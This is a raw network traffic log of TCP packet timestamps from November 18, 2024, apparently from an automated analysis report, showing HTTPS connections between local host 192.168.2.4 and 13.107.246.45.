                                            Nov 18, 2024 21:16:35.163340092 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.357681036 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.357701063 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.357769966 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.357779980 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.357800961 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.357819080 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.357845068 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.357856035 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.371026039 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.371042967 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.371109962 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.371118069 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.371161938 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.478198051 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.478221893 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.478283882 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.478336096 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.478372097 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.478396893 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.491909027 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.491995096 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.492008924 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.492029905 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.492079020 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.492079020 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.495023012 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.495073080 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.495101929 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.495147943 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.495177031 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.495196104 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.497575998 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.497620106 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.497657061 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.497669935 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.497699022 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.497720003 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.598364115 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.598422050 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.598474979 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.598509073 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.598536968 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.598578930 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.610289097 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.610342979 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.610367060 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.610374928 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.610413074 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.610421896 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.611097097 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.611140013 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.611167908 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.611180067 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.611212015 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.611233950 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.611932039 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.611993074 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.612011909 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.612025976 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.612060070 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.612099886 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.613059044 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.613121033 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.613138914 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.613152027 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.613192081 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.613214016 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.613775969 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.613832951 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.613851070 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.613862991 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.613893986 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.613912106 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.615217924 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.615262032 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.615277052 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.615288973 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.615335941 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.615335941 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.720149040 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.720241070 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.720272064 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.720335960 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.720340014 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.720392942 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.720633030 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.720683098 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.720715046 CET49775443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.720731020 CET4434977513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.781222105 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.781275988 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.781366110 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.782402992 CET49777443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.782454967 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.782514095 CET49777443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.783204079 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.783220053 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.783276081 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.785212040 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.785223961 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.785284042 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.785794973 CET49780443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.785831928 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.785890102 CET49780443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.785991907 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.786011934 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.786331892 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.786349058 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.786417007 CET49780443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.786427975 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.786529064 CET49777443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.786544085 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:35.786609888 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:35.786629915 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.515573025 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.516608953 CET49780443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.516630888 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.517093897 CET49780443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.517100096 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.519438028 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.519840956 CET49777443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.519860029 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.520416975 CET49777443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.520423889 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.523931980 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.524295092 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.524323940 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.524635077 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.524641037 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.526561975 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.526868105 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.526878119 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.527383089 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.527389050 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.639473915 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.640185118 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.640223980 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.640928030 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.640945911 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.643992901 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.644313097 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.644381046 CET49780443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.644423008 CET49780443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.644423008 CET49780443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.644445896 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.644459009 CET4434978013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.647612095 CET49781443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.647645950 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.647720098 CET49781443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.647840977 CET49781443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.647852898 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.653785944 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.653814077 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.653877020 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.653893948 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.653927088 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.653939962 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.653960943 CET49777443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.653986931 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.654050112 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.654055119 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.654068947 CET49776443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.654073954 CET49777443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.654077053 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.654086113 CET4434977613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.654088020 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.654100895 CET49777443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.654105902 CET4434977713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656476974 CET49782443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.656502962 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656501055 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656555891 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656584024 CET49782443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.656610012 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.656620026 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656694889 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656724930 CET49782443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.656739950 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656744003 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.656819105 CET49783443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.656836033 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656841040 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.656845093 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656853914 CET49779443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.656857014 CET4434977913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.656893969 CET49783443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.657005072 CET49783443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.657018900 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.659115076 CET49784443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.659203053 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.659291029 CET49784443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.659416914 CET49784443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.659451962 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.794426918 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.794447899 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.794493914 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.794598103 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.794651985 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.794970989 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.794994116 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.795008898 CET49778443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.795016050 CET4434977813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.798544884 CET49785443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.798648119 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:36.798747063 CET49785443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.798893929 CET49785443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:36.798916101 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.396960974 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.397655964 CET49783443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.397675037 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.398067951 CET49783443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.398072958 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.401741982 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.402146101 CET49781443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.402153969 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.402503014 CET49781443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.402508020 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.409255981 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.409545898 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.409805059 CET49784443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.409826994 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.410208941 CET49782443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.410243988 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.410264015 CET49784443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.410269022 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.410662889 CET49782443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.410669088 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.529753923 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.529936075 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.529984951 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.530015945 CET49783443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.530189037 CET49783443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.530213118 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.530226946 CET49783443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.530236006 CET4434978313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.530441046 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.530548096 CET49781443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.531550884 CET49781443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.531562090 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.531629086 CET49781443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.531636953 CET4434978113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.534331083 CET49786443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.534379959 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.534457922 CET49786443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.536678076 CET49787443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.536777020 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.536818981 CET49786443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.536835909 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.536859035 CET49787443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.536988020 CET49787443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.537020922 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.541951895 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.542089939 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.542159081 CET49784443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.542221069 CET49784443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.542231083 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.542243004 CET49784443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.542247057 CET4434978413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.542623997 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.542778015 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.542840958 CET49782443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.542870045 CET49782443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.542882919 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.542891979 CET49782443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.542896986 CET4434978213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.545054913 CET49788443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.545083046 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.545150995 CET49788443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.545275927 CET49788443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.545289040 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.546437025 CET49789443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.546479940 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.546544075 CET49789443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.546689034 CET49789443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.546705961 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.550818920 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.551201105 CET49785443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.551239967 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.551668882 CET49785443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.551681995 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.684232950 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.684523106 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.684613943 CET49785443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.684782982 CET49785443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.684803009 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.684834957 CET49785443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.684843063 CET4434978513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.688937902 CET49790443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.688970089 CET4434979013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:37.689063072 CET49790443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.689301014 CET49790443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:37.689311028 CET4434979013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.278091908 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.278918982 CET49787443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.278964043 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.279304981 CET49787443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.279318094 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.289051056 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.289371967 CET49788443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.289391994 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.289836884 CET49788443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.289843082 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.309683084 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.310203075 CET49786443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.310224056 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.310584068 CET49786443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.310589075 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.408730984 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.409682989 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.409763098 CET49787443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.409879923 CET49787443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.409930944 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.409961939 CET49787443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.409977913 CET4434978713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.413666010 CET49791443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.413767099 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.413866043 CET49791443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.414007902 CET49791443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.414032936 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.427932024 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.428446054 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.428508043 CET49788443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.428591967 CET49788443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.428611994 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.428627968 CET49788443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.428632975 CET4434978813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.431838989 CET49792443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.431879997 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.431957006 CET49792443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.432068110 CET49792443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.432082891 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.440084934 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.441127062 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.441216946 CET49786443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.441297054 CET49786443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.441320896 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.441337109 CET49786443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.441344023 CET4434978613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.442764044 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.443257093 CET49789443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.443279982 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.444016933 CET49789443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.444030046 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.444756031 CET49793443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.444830894 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.444921017 CET49793443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.445135117 CET49793443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.445168972 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.570533991 CET4434979013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.571261883 CET49790443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.571294069 CET4434979013.107.246.45192.168.2.4
